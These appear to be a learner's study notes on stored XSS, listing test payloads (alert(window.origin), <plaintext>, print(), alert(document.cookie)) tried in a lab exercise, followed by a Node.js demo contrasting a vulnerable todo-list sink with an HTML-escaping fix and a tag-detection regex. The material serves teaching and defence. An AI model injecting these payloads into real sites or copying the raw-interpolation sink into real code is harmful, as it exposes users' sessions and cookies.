# Intro

- The most critical type of XSS vulnerability is `Stored XSS`, also called `Persistent XSS`
- If the injected XSS payload gets stored in the back-end database and is retrieved every time the page is visited, the attack is persistent and may affect any user who visits the page
- This makes this type of XSS the most critical, as it reaches a much wider audience: every user who loads the page becomes a victim
- Furthermore, Stored XSS may not be easy to remove, as the payload may need to be deleted from the back-end database

# XSS Testing Payload

- Basic XSS payload

```html
<script>alert(window.origin)</script>
```

- If successful, the alert below is shown, and the payload appears in the page source when pressing [Ctrl+U]
- `window.origin` is used rather than a fixed string so the alert also confirms which origin the script is running in (i.e. that the payload executes in the context of the target page)

![[images/Pasted image 20251212195425.png]]

```html
<div></div><ul class="list-unstyled" id="todo"><ul><script>alert(window.origin)</script>
</ul></ul>
```

- Other XSS payloads
    - As some modern browsers may block the `alert()` JavaScript function in specific locations, it is handy to know a few other basic XSS payloads to verify the existence of XSS
    - `<plaintext>` stops the browser from rendering any HTML that comes after it and displays it as plain text
    - `<script>print()</script>` pops up the browser print dialog, which is unlikely to be blocked by any browser

# Exercise

- try basic alert payload > works

```html
<script>alert(window.origin)</script>
```

![[images/Pasted image 20251212200824.png]]

- try the plaintext payload below > works

```html
<plaintext>
```

![[images/Pasted image 20251212200004.png]]

- try the print dialog payload > works

```html
<script>print()</script>
```

![[images/Pasted image 20251212200058.png]]

- try to leak the cookie with the modified alert payload below > works
    - note that `document.cookie` only exposes cookies set without the `HttpOnly` flag; a session cookie marked `HttpOnly` will not appear in the alert

```html
<script>alert(document.cookie)</script>
```

![[images/Pasted image 20251212200405.png]]![[images/Pasted image 20251212200420.png]]
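The stored XSS flow described in these notes (payload persisted in the back end, then interpolated raw into the `<ul id="todo">` list on every page load) can be modelled in a few lines of Node.js. The block below is an added example, not code from the original notes or from the exercise's target application: `db`, `storeTodo`, `renderTodos`, `renderTodosSafe`, `escapeHtml` and `containsLivePayload` are all assumed names, and the in-memory `db` array is a constructed stand-in for the real back-end database. It renders the same four test payloads through a vulnerable sink and through a hardened one that HTML-encodes stored text on output, which is the fix for this class of bug.

```javascript
// Added example (not part of the original notes): a minimal model of a
// stored XSS sink. `renderTodos` mirrors the vulnerable page source seen
// in the notes: each stored todo item is concatenated into the HTML
// unchanged. `renderTodosSafe` is the hardened version, which entity-encodes
// the stored value before interpolation.

const db = []; // constructed stand-in for the back-end database table

// Store side: never validates, persists whatever the user submitted.
// Returns the number of stored rows.
function storeTodo(text) {
  db.push(String(text));
  return db.length;
}

// Vulnerable sink: raw string interpolation into the todo list.
// Every visitor who triggers this render gets the stored payload.
function renderTodos() {
  return '<ul class="list-unstyled" id="todo">' +
    db.map(t => '<li>' + t + '</li>').join('') +
    '</ul>';
}

// HTML entity encoding for text nodes and double-quoted attribute values:
// the five characters that can break out of a text context or an attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
  })[c]);
}

// Hardened sink: identical markup, but the stored value is encoded at the
// point of output, so "<script>" reaches the browser as "&lt;script&gt;".
function renderTodosSafe() {
  return '<ul class="list-unstyled" id="todo">' +
    db.map(t => '<li>' + escapeHtml(t) + '</li>').join('') +
    '</ul>';
}

// Tripwire for the tags used in the test payloads above. This is not an
// HTML parser; it only answers "did a <script> or <plaintext> tag survive
// as live markup in the rendered output?"
const LIVE_TAGS = /<(script|plaintext)\b/i;
function containsLivePayload(html) {
  return LIVE_TAGS.test(html);
}

// The four payloads from the exercise, submitted once. Because they are
// persisted, every later call to renderTodos() serves them again.
const PAYLOADS = [
  '<script>alert(window.origin)</script>',
  '<plaintext>',
  '<script>print()</script>',
  '<script>alert(document.cookie)</script>',
];
PAYLOADS.forEach(storeTodo);

console.log('vulnerable render:\n' + renderTodos());
console.log('hardened render:\n' + renderTodosSafe());
console.log('vulnerable has live payload:', containsLivePayload(renderTodos()));
console.log('hardened has live payload:  ', containsLivePayload(renderTodosSafe()));
```

Run it with `node` and compare the two renders: in the vulnerable output the `<plaintext>` item alone would stop the browser rendering everything after it, while in the hardened output all four items are shown literally as text. Output encoding has to happen in the template, not at storage time, so that the same stored value can be safely reused in other contexts (JSON, SQL, logs) that need different encoding.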